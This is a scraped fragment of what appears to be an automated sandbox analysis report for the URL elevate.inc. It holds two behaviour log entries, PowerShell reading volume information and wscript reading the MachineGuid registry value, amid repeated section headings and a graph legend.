Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Windows Analysis Report
https://www.elevate.inc/

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Windows Analysis Report https://www.elevate.inc/

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Windows Analysis Report
https://www.elevate.inc/